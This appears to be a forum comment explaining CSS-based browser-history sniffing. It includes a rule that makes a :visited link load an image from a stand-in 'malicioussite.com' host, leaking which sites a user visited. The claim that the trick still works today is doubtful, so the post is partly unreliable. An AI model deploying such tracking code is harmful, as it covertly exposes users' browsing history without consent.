|
|
|
|
|
|
by NackerHughes
1297 days ago
|
|
|
You can still do this today via CSS. Simply add an ::after pseudo-element to the :visited link with a URL that you control, e.g.: (semi-pseudocode example): a[href="https://foouniversity.edu/bookstore/"]:visited::after {
content: url(https://malicioussite.com/fingerprintme.png?wentto=foouniversity);
}
The user's browser will handily automatically send a request to the site, logging their visit on your end.Not 100% sure if browsers block this (they probably can, or otherwise definitely should!) via cross-origin policies or whatever, but if you control the site that the links are on then you can set the cross-origin policy yourself, without any need of a hidden iframe or similar things that are 'obviously scary' to safety-conscious Chromium browsers. This isn't just something I made up either: https://csstracking.dev/ https://css-tricks.com/css-based-fingerprinting/ https://github.com/OliverBrotchie/CSS-Fingerprint |
|
|